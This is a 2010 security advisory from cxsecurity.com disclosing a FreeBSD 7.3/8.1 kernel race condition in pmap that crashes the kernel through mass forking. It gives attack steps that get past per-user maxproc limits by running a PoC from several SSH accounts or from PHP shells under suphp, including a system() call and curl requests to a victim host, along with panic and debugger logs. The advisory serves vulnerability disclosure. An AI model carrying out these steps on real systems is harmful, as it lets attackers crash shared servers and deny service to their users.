FreeBSD 8.1/7.3 vm.pmap kernel local race condition

Published
Credit
Risk
2010.09.07
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
N/A
CVE-GENERIC
Yes
No

[ FreeBSD 8.1/7.3 vm.pmap kernel local race condition ]

Author: Maksymilian Arciemowicz
Date:
- - Dis.: 09.07.2010
- - Pub.: 07.09.2010

Affected Software (verified):
- - FreeBSD 7.3/8.1


- --- 0.Description ---
maxproc
This is the maximum number of processes a user may be running. This includes foreground and background processes alike. For obvious reasons, this may not be larger than the system limit specified by the kern.maxproc sysctl(8). Also note that setting this too small may hinder a user's productivity: it is often useful to be logged in multiple times or execute pipelines. Some tasks, such as compiling a large program, also spawn multiple processes (e.g., make(1), cc(1), and other intermediate preprocessors).
vm.pmap.shpgperproc


- --- 1. FreeBSD 8.1/7.3 kernel local race condition ---
Race condition in pmap, allows attackers to denial of service freebsd kernel. Creating a lot of process by fork() (~ kern.maxproc), it's possible to denial kernel.
To bypass the MAXPROC from login.conf, we can use a few users to run PoC in this same time, to reach kern.maxproc. suphp can be very usefully.

We need choose vector attack. When we have access to few users via ssh, use openssh.

Example attack by ssh (POC http://cxsecurity.com/cxexploit/16):

127# ssh cx@0
Password:
$ gcc -o poc81 poc81.c
$ ./poc81

and in the same time (symetric)

127# ssh max@0
Password:
$ gcc -o poc81 poc81.c
$ ./poc81

Result:
Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
Jul 29 08:42:01 127 last message repeated 31 times
Jul 29 08:44:02 127 last message repeated 119 times
Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel
Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see tuning(7) and login.conf(5).
Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase vm.pmap.shpgperproc
Jul 29 08:50:27 127 kernel: cpuid = 0
Jul 29 08:50:27 127 kernel: Uptime: 13m23s
Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable.
Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key on the console to abort
Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot,
Jul 29 08:50:27 127 kernel: --> or switch off the system now.
Jul 29 08:50:27 127 kernel: Rebooting...
Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project.

But when we have php-shell from several uid`s, we can also use suphp.

Example attack by suphp:
127# cat cxuser.php
<?php
system("./def");
?>
127# ls -la
total 16
drwxr-xr-x 2 root wheel 512 Jul 29 08:43 .
drwxr-xr-x 4 root wheel 512 Jul 29 08:38 ..
- -rw-r--r-- 1 cx cx 27 Jul 29 08:38 cxuser.php
- -rwxr-xr-x 1 cx cx 7220 Jul 29 08:38 def
- -rw-r--r-- 1 max max 27 Jul 29 08:43 maxuser.php

now remote request to cxuser.php and maxuser.php

curl http://victim/hack/cxuser.php
and in the same time
curl http://victim/hack/maxuser.php

result:
Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0
Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel
Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase vm.pmap.shpgperproc
Jul 29 08:48:30 localhost kernel: cpuid = 0
Jul 29 08:48:30 localhost kernel: Uptime: 4m43s
Jul 29 08:48:30 localhost kernel:
Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small.
Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press a key on the console to abort
Jul 29 08:48:30 localhost kernel: Rebooting...
Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD Project.


- ---debug log - cron (uid=0)---
...
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
panic: get_pv_entry: increase vm.pmap.shpgperproc
cpuid = 0
KDB: enter: panic
[ thread pid 7417 tid 106207 ]
Stopped at kdb_enter+0x3a: movl $0,kdb_why
...
KDB: enter: panic
[ thread pid 7417 tid 106207 ]
Stopped at kdb_enter+0x3a: movl $0,kdb_why
db> ps
pid ppid pgrp uid state wmesg wchan cmd
7417 880 880 0 RL CPU 0 cron
7416 880 880 0 RL cron
7415 7413 880 0 RVL cron
7414 7412 7412 0 R sh
7413 880 880 0 D ppwait 0xc8118548 cron
7412 7411 7412 0 Ss wait 0xc8118aa0 sh
7411 880 880 0 S piperd 0xc4d7eab8 cron
7410 5367 1294 1001 RL+ def
7409 5366 1294 1001 RL+ def
7408 5365 1294 1001 RL+ def
7407 5364 1294 1001 RL+ def
7406 5363 1294 1001 RL+ def
7405 5362 1294 1001 RL+ def
7404 5361 1294 1001 RL+ def
...
db> trace
Tracing pid 7417 tid 106207 td 0xc8113280
kdb_enter(c0ccfb5c,c0ccfb5c,c0d0a037,e7f9da38,0,...) at kdb_enter+0x3a
panic(c0d0a037,10,c0d09b5f,88c,0,...) at panic+0x136
get_pv_entry(c80bcce0,0,c0d09b5f,ccd,c0fabd00,...) at get_pv entry+0x252
pmap_enter(c80bcce0,a0f7000,1,c2478138,5,...) at pmap_enter+0x34c
vm_fault(c8Obcc30,a0f7000,1,0,a0f711b,...) at vm_fault+0x1b02
trap_pfault(5,0,c0dOblle,c0cd1707,c8118550,...) at trap_pfault+0xl0d
trap(e7f9dd28) at trap+0x2d0
calltrap() at calltrap+0x6
- --- trap 0xc, eip = 0xa0f711b, esp = 0xbfbfec8c, ebp = 0xbfbfecc8 --
db> show pcpu
cpuid = 0
dynamic pcpu = 0x627d00
curthread = 0xc8113280: pid 7417 "cron"
curpcb = 0xe7f9dd80
fpcurthread = none
idlethread = 0xc4183a00: tid 100003 "idle: cpu0"
APIC ID = 0
currentldt = 0x50
spin locks held:
...
db> show registers
cs 0x20
ds 0xc0cc0028
es 0xc0d00028
fs 0xc08f0008 free_unr+0x188
ss 0x28
eax 0xc0ccfb5c
ecx 0xc148792f
edx 0
ebx 0xl
esp 0xe7f9d9f8
ebp 0xe7f9da00
esi 0x100
edi 0xc8113280
eip 0xc08de44a kdb_enter+0x3a
efl 0x286
kdb_enter+0x3a: movl $0,kdb_why
...
db> show page
cnt.v_free_count: 104827
cnt.v_cache_count: 11
cnt.v_inactive_count: 3369
cnt.v_active_count: 44397
cnt.v_wire_count: 58250
cnt.v_free_reserved: 324
cnt.v_free_min: 1377
cnt.v_free_target: 5832
cnt.v_cache_min: 5832
cnt.v_inactive_target: 8748
...
- ---debug log - crash in cron (uid=0)---

- ---debug log - crash in def (uid=1001)---
db> ps
...
6774 4777 2009 1001 RL+ def
6773 4777 2009 1001 RL+ CPU 0 def
6772 4777 2009 1001 RL+ def
...
db> show pcpu
cpuid = 0
dynamic pcpu = 0x627d00
curthread = Oxc8c34c80: pid 6773 "def"
curpcb = Oxe97f6d80
fpcurthread = none
idlethread = 0xc4183a00: tid 100003 "idle: cpu0"
APIC ID = 0
currentldt = 0x50
spin locks held:
...
- ---debug log - crash in def (uid=1001)---

- --- 2. PoC def2.c ---
http://cxsecurity.com/cxexploit/16


- --- 3. Greets ---
Infospec, Adam Zabrocki 'pi3'


- --- 4. Contact ---
Author:Maksymilian Arciemowicz

References:

http://securityreason.com/achievement_exploitalert/16


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2016, cxsecurity.com